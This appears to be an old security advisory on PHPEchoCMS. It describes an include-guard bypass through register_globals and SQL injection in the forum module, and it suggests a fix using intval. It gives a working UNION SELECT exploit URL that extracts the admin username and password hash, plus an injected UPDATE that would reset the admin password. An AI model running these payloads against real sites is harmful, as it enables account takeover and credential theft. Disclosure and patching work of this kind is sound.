Hello,, PHPEchoCMS Multible remote vulnerabilitis Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security@xxxxxxxxx fiest thing .. full path kernel/init.php modules/admin/index.php .. every file to be included has to have the value of the variable $BASE_LOAD but if the register globals is on then you can use in the browser like this .. modules/files/index.php?BASE_LOAD=1 it will continue .. and other files too modules/forum/index.php lines [31-49] if (@$_POST['post']=='thread') { if (@$_POST['id'] && $_POST['title'] && $_POST['contents']) { // Add the thread to the specified section $ins = "INSERT INTO `".PREFIX."threads` VALUES ('', '".addslashes($_POST['id'])."', '-1', '".addslashes($_POST['title']). "', '".str_replace("\n", "<br>", addslashes($_POST['contents']))."', '".$_SESSION['username']."','".date("d-m-Y H:i")."', '0')"; $res = query($ins, 1); $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y H:i")." WHERE `id`=".addslashes($_POST['id']); $res = query($ins, 1); $nb = query("SELECT max(`id`) FROM `".PREFIX."threads`", 2); redirect ("index.php?module=forum&show=thread&id=".$nb); } else { $content = $mlang['017']; } } see $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y H:i")." WHERE `id`=".addslashes($_POST['id']); could be modified to an update query by posting value of id as next id=union update members set password=[value] where id=1 offcourse value here should be md5 hash .. and no brackets so the query will be ok :) lines[138-142] elseif (@$_GET['show']=='thread' && $_GET['id']) { // Show a thread and its replies (child-threads) $thread = query("SELECT * FROM `".PREFIX."threads` WHERE id=".addslashes($_GET['id']), 4); replace with elseif (@$_GET['show']=='thread' && $_GET['id']) { // Show a thread and its replies (child-threads) $thread = query("SELECT * FROM `".PREFIX."threads` WHERE id='".intval($_GET['id'])."'", 4); exploit index.php?module=forum&show=thread&id=-1%20union%20select%201,2,3,username,password,username,password,8%20from%20phpecms_users%20where%20id=1/* # WwW.SoQoR.NeT
